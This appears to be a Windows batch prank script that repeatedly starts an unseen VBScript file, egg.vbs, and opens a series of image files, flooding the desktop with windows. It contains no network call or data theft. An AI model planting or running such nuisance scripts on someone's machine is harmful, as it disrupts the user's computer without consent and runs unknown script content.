@echo off
:main
start egg.vbs
start egg1.jpg
start egg.vbs
start egg2.webp
start egg.vbs
start egg3.avif
start egg.vbs
start egg4.jpg
start egg.vbs
start egg5.jpg
start egg.vbs
start egg6.webp
start egg.vbs
start egg7.jpg
start egg.vbs
start egg8.jpg
start egg.vbs
start egg9.jpg
start egg.vbs
start egg10.jpg
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg1.jpg
start egg.vbs
start egg2.webp
start egg.vbs
start egg3.avif
start egg.vbs
start egg4.jpg
start egg.vbs
start egg5.jpg
start egg.vbs
start egg6.webp
start egg.vbs
start egg7.jpg
start egg.vbs
start egg8.jpg
start egg.vbs
start egg9.jpg
start egg.vbs
start egg10.jpg
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg1.jpg
start egg.vbs
start egg2.webp
start egg.vbs
start egg3.avif
start egg.vbs
start egg4.jpg
start egg.vbs
start egg5.jpg
start egg.vbs
start egg6.webp
start egg.vbs
start egg7.jpg
start egg.vbs
start egg8.jpg
start egg.vbs
start egg9.jpg
start egg.vbs
start egg10.jpg
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg1.jpg
start egg.vbs
start egg2.webp
start egg.vbs
start egg3.avif
start egg.vbs
start egg4.jpg
start egg.vbs
start egg5.jpg
start egg.vbs
start egg6.webp
start egg.vbs
start egg7.jpg
start egg.vbs
start egg8.jpg
start egg.vbs
start egg9.jpg
start egg.vbs
start egg10.jpg
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
start egg.vbs
